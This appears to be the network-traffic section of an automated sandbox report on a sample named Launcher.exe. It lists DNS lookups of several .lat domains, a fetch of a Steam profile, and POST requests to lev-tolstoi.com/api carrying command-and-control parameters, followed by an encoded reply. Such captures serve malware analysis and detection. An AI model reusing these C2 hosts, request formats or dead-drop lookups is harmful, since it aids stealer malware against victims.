                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.184783936 CET49762443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.184799910 CET44349762104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.184889078 CET44349762104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.185076952 CET49762443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.185148001 CET49762443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.227349997 CET44349762104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.227643967 CET49762443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.227766037 CET49762443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.227807045 CET49762443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.275368929 CET44349762104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.278640985 CET49762443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.278729916 CET49762443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.278769016 CET49762443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.320595980 CET49762443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.320615053 CET44349762104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:31.544893026 CET44349762104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:38.639003992 CET44349762104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:38.639257908 CET44349762104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:38.639352083 CET49762443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:38.639452934 CET49762443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:38.639477968 CET44349762104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:38.648803949 CET49783443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:38.648844957 CET44349783104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:38.648936033 CET49783443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:38.649203062 CET49783443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:38.649224043 CET44349783104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:39.867623091 CET44349783104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:39.867758036 CET49783443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:39.869575024 CET49783443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:39.869589090 CET44349783104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:39.870011091 CET44349783104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:39.871663094 CET49783443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:39.871707916 CET49783443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:39.871776104 CET44349783104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:40.653171062 CET44349783104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:40.653307915 CET44349783104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:40.653395891 CET49783443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:40.653605938 CET49783443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:40.653620958 CET44349783104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:40.653636932 CET49783443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:40.653645039 CET44349783104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                          Dec 22, 2024 23:49:57.881650925 CET6002453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 22, 2024 23:49:58.105310917 CET53600241.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:49:58.128956079 CET5737853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 22, 2024 23:49:58.515722036 CET53573781.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:49:58.518569946 CET5811953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 22, 2024 23:49:58.996982098 CET53581191.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:49:58.998433113 CET6334053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 22, 2024 23:49:59.305232048 CET53633401.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:49:59.374716997 CET5113453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 22, 2024 23:49:59.764899969 CET53511341.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:49:59.769175053 CET6255753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:00.076095104 CET53625571.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:00.095091105 CET5306253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:00.320553064 CET53530621.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:00.322272062 CET5761153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:00.542573929 CET53576111.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:00.544562101 CET6104253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:00.946012974 CET53610421.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:00.949609995 CET5437853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:01.089485884 CET53543781.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.513279915 CET5509853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.780056000 CET53550981.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                          Dec 22, 2024 23:49:57.881650925 CET192.168.2.51.1.1.10x6a3bStandard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 22, 2024 23:49:58.128956079 CET192.168.2.51.1.1.10xea53Standard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 22, 2024 23:49:58.518569946 CET192.168.2.51.1.1.10xb652Standard query (0)discokeyus.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 22, 2024 23:49:58.998433113 CET192.168.2.51.1.1.10xe9d1Standard query (0)necklacebudi.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 22, 2024 23:49:59.374716997 CET192.168.2.51.1.1.10x4a42Standard query (0)energyaffai.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 22, 2024 23:49:59.769175053 CET192.168.2.51.1.1.10x4058Standard query (0)aspecteirs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:00.095091105 CET192.168.2.51.1.1.10xfcefStandard query (0)sustainskelet.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:00.322272062 CET192.168.2.51.1.1.10x7e99Standard query (0)crosshuaht.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:00.544562101 CET192.168.2.51.1.1.10xa8b1Standard query (0)rapeflowwj.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:00.949609995 CET192.168.2.51.1.1.10x57deStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.513279915 CET192.168.2.51.1.1.10xeabStandard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                          Dec 22, 2024 23:49:58.105310917 CET1.1.1.1192.168.2.50x6a3bName error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 22, 2024 23:49:58.515722036 CET1.1.1.1192.168.2.50xea53Name error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 22, 2024 23:49:58.996982098 CET1.1.1.1192.168.2.50xb652Name error (3)discokeyus.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 22, 2024 23:49:59.305232048 CET1.1.1.1192.168.2.50xe9d1Name error (3)necklacebudi.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 22, 2024 23:49:59.764899969 CET1.1.1.1192.168.2.50x4a42Name error (3)energyaffai.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:00.076095104 CET1.1.1.1192.168.2.50x4058Name error (3)aspecteirs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:00.320553064 CET1.1.1.1192.168.2.50xfcefName error (3)sustainskelet.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:00.542573929 CET1.1.1.1192.168.2.50x7e99Name error (3)crosshuaht.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:00.946012974 CET1.1.1.1192.168.2.50xa8b1Name error (3)rapeflowwj.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:01.089485884 CET1.1.1.1192.168.2.50x57deNo error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.780056000 CET1.1.1.1192.168.2.50xeabNo error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 22, 2024 23:50:03.780056000 CET1.1.1.1192.168.2.50xeabNo error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          • steamcommunity.com
                                                                                                                                                                                                                                                          • lev-tolstoi.com
                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          0192.168.2.54970523.55.153.1064436292C:\Users\user\Desktop\Launcher.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-22 22:50:02 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                                                                                                                          2024-12-22 22:50:03 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 22:50:03 GMT
                                                                                                                                                                                                                                                          Content-Length: 35121
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: sessionid=81ac01a1f84d6323cede00b0; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                          Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                          2024-12-22 22:50:03 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                          2024-12-22 22:50:03 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                          Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                                          2024-12-22 22:50:03 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                          Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          1192.168.2.549708104.21.66.864436292C:\Users\user\Desktop\Launcher.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-22 22:50:05 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                                          Host: lev-tolstoi.com
                                                                                                                                                                                                                                                          2024-12-22 22:50:05 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                                          2024-12-22 22:50:05 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 22:50:05 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=kg57b797tng7q99kab0ueujdpv; expires=Thu, 17 Apr 2025 16:36:44 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hehtWAF09ISpAQ1v5C5%2BJwFyOVGDQWDeerWUKslHsh62zTzcnZzrTRqP8TQzDGJwe847IfI4bGJnXOGeFlOWopJP0X9kO67kbP2BqZ%2Ba3gf0uBBojhB8kZVwNkEaaJMo%2F8s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f63ab36ffc242ec-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1592&rtt_var=620&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1733966&cwnd=183&unsent_bytes=0&cid=1aae804e4c102f67&ts=794&x=0"
                                                                                                                                                                                                                                                          2024-12-22 22:50:05 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                                                                                                                          2024-12-22 22:50:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          2192.168.2.549712104.21.66.864436292C:\Users\user\Desktop\Launcher.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-22 22:50:07 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Length: 51
                                                                                                                                                                                                                                                          Host: lev-tolstoi.com
                                                                                                                                                                                                                                                          2024-12-22 22:50:07 UTC51OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 32 32 39 31 34 37 39 31 26 6a 3d
                                                                                                                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--622914791&j=
                                                                                                                                                                                                                                                          2024-12-22 22:50:08 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 22:50:07 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=sdnerekmh24btpjtkde9e5ffba; expires=Thu, 17 Apr 2025 16:36:46 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1kNMDwcS6G7AG%2BhhFghAaoHWXUuG2Z0aAoMc0TvaOCbCxMaizdWWGB4fProiPk9vS953PTqlybZqM8tbjCvBUvSp9pb%2FVU9B4rDhiu%2Bo6%2Fgdkm8SPJaezImnfR1hfBQUSfA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f63ab43b9448c27-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1811&min_rtt=1799&rtt_var=699&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=950&delivery_rate=1540084&cwnd=243&unsent_bytes=0&cid=bcd6a7292c1f64ec&ts=1072&x=0"
                                                                                                                                                                                                                                                          2024-12-22 22:50:08 UTC243INData Raw: 32 64 31 63 0d 0a 6b 48 68 30 68 4c 39 31 48 55 68 48 37 35 74 55 53 55 35 67 46 77 49 35 4f 65 48 56 6f 6c 59 2b 42 6b 57 42 6f 50 33 77 38 6e 2f 72 57 67 4b 6d 68 55 45 78 61 6a 53 4b 75 57 34 39 50 42 56 79 4c 68 74 59 68 66 65 59 4d 46 39 71 4e 75 53 4d 33 34 61 66 58 61 6f 65 46 65 6a 4d 45 44 46 71 49 70 65 35 62 68 49 31 51 6e 4a 73 47 77 50 44 73 4d 67 30 58 32 6f 6e 34 4d 75 53 67 4a 34 63 2b 42 51 54 37 4e 6f 57 65 53 6b 72 67 76 34 78 4c 43 38 4b 65 57 74 55 55 59 7a 33 6a 6e 52 62 66 47 65 37 67 72 43 56 68 68 37 64 47 51 66 76 6e 51 67 78 4d 32 57 4b 39 58 5a 7a 62 41 46 79 59 46 56 66 68 62 37 4b 50 6c 5a 69 4a 75 58 4b 6a 5a 6d 55 46 2f 67 61 45 4f 33 51 48 32 30 6b 49 59 58 31 4e 79 59 76 51 6a 73 67 58
                                                                                                                                                                                                                                                          Data Ascii: 2d1ckHh0hL91HUhH75tUSU5gFwI5OeHVolY+BkWBoP3w8n/rWgKmhUExajSKuW49PBVyLhtYhfeYMF9qNuSM34afXaoeFejMEDFqIpe5bhI1QnJsGwPDsMg0X2on4MuSgJ4c+BQT7NoWeSkrgv4xLC8KeWtUUYz3jnRbfGe7grCVhh7dGQfvnQgxM2WK9XZzbAFyYFVfhb7KPlZiJuXKjZmUF/gaEO3QH20kIYX1NyYvQjsgX
                                                                                                                                                                                                                                                          2024-12-22 22:50:08 UTC1369INData Raw: 45 50 44 37 34 42 6e 62 6d 63 32 38 74 65 53 67 70 5a 64 37 56 51 50 70 74 6f 62 50 33 4a 6c 68 66 55 34 4c 69 38 4e 63 6d 46 62 53 59 79 33 77 7a 78 55 59 43 33 73 7a 5a 43 63 6d 68 72 36 45 78 48 70 32 68 39 35 4a 53 62 4e 74 33 59 73 4e 45 49 74 49 48 74 4c 67 4c 54 55 4f 55 30 6b 4f 4b 33 62 33 35 57 63 58 61 70 61 45 4f 6a 63 47 6e 38 34 4c 59 62 79 4d 7a 6b 6e 43 33 68 74 57 31 61 4a 75 4d 4d 30 57 32 34 74 37 4d 69 62 6e 35 30 62 38 68 70 57 71 4a 30 51 5a 32 70 39 7a 64 6f 7a 4f 79 73 4f 59 79 4a 68 47 35 7a 35 32 58 52 62 61 47 65 37 67 70 65 58 6b 78 37 35 46 52 58 75 31 67 56 2f 4f 43 4f 41 2f 43 51 74 4b 51 78 2f 59 30 6c 52 6a 62 48 44 50 56 64 74 49 75 54 47 33 39 7a 51 47 75 70 61 54 71 62 38 47 6e 51 6d 4c 35 72 35 64 6a 52 69 47 7a 56 6e
                                                                                                                                                                                                                                                          Data Ascii: EPD74Bnbmc28teSgpZd7VQPptobP3JlhfU4Li8NcmFbSYy3wzxUYC3szZCcmhr6ExHp2h95JSbNt3YsNEItIHtLgLTUOU0kOK3b35WcXapaEOjcGn84LYbyMzknC3htW1aJuMM0W24t7Mibn50b8hpWqJ0QZ2p9zdozOysOYyJhG5z52XRbaGe7gpeXkx75FRXu1gV/OCOA/CQtKQx/Y0lRjbHDPVdtIuTG39zQGupaTqb8GnQmL5r5djRiGzVn
                                                                                                                                                                                                                                                          2024-12-22 22:50:08 UTC1369INData Raw: 48 50 4f 56 41 6b 61 61 50 46 68 39 4c 49 58 64 67 5a 41 75 58 58 56 55 6f 70 4b 34 50 2b 49 47 73 7a 54 47 77 67 58 46 66 44 37 34 41 35 58 57 77 68 38 63 32 53 6b 5a 34 54 2f 52 38 5a 37 74 30 58 63 69 38 68 68 76 49 31 4a 69 67 51 66 32 42 54 58 6f 4b 39 79 6e 51 53 4a 43 44 37 67 73 66 53 6f 51 72 35 57 43 50 6c 30 78 6c 34 50 47 57 53 74 79 39 72 4b 77 34 31 4f 42 74 57 69 37 4c 46 4f 31 31 75 4b 65 62 49 6b 35 71 65 48 75 41 56 45 75 62 52 48 33 55 6e 4b 34 6e 78 50 79 41 6e 42 48 56 68 55 52 76 4e 39 38 63 73 48 44 78 6e 31 38 57 54 6e 35 39 66 78 78 6b 59 36 4e 6f 42 50 7a 56 72 6c 4c 6b 78 4a 32 78 61 4e 57 78 53 57 34 69 39 78 44 52 62 61 53 4c 67 78 5a 79 66 6c 78 66 38 48 52 4c 71 31 42 70 35 4b 69 4b 4a 2f 43 51 75 4a 51 35 35 49 42 55 62 68
